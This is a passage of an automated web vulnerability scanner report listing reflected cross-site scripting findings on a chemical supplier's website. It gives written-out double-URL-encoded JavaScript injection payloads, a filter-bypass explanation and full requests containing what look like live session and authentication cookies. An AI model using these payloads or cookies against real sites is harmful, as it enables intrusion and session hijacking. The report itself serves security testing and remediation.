Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:43 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/servicesd593c";alert(1)//d73e4680211/facility-operations/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.183. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be459%2522%253balert%25281%2529%252f%252fe9d7d10188d was submitted in the REST URL parameter 6. This input was echoed as be459";alert(1)//e9d7d10188d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/facility-operationsbe459%2522%253balert%25281%2529%252f%252fe9d7d10188d/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:44 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/facility-operationsbe459";alert(1)//e9d7d10188d/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.184. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9696%2522%253balert%25281%2529%252f%252f6c5c4df6af0 was submitted in the REST URL parameter 7. This input was echoed as b9696";alert(1)//6c5c4df6af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handlingb9696%2522%253balert%25281%2529%252f%252f6c5c4df6af0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:46 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
cript language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handlingb9696";alert(1)//6c5c4df6af0","E404") ;
   </script>
...[SNIP]...

1.185. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4b74%2522%253balert%25281%2529%252f%252f20aa999b365 was submitted in the REST URL parameter 1. This input was echoed as d4b74";alert(1)//20aa999b365 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentd4b74%2522%253balert%25281%2529%252f%252f20aa999b365/sigma-aldrich/customer-support/customer-service/services/mfg-production HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:30 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentd4b74";alert(1)//20aa999b365/sigma-aldrich/customer-support/customer-service/services/mfg-production","E404") ;
   </script>
...[SNIP]...

1.186. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2c8e%2522%253balert%25281%2529%252f%252f6eab9ea52b4 was submitted in the REST URL parameter 2. This input was echoed as f2c8e";alert(1)//6eab9ea52b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichf2c8e%2522%253balert%25281%2529%252f%252f6eab9ea52b4/customer-support/customer-service/services/mfg-production HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichf2c8e";alert(1)//6eab9ea52b4/customer-support/customer-service/services/mfg-production","E404") ;
   </script>
...[SNIP]...

1.187. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77f4b%2522%253balert%25281%2529%252f%252f01ff7cdb67d was submitted in the REST URL parameter 3. This input was echoed as 77f4b";alert(1)//01ff7cdb67d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support77f4b%2522%253balert%25281%2529%252f%252f01ff7cdb67d/customer-service/services/mfg-production HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
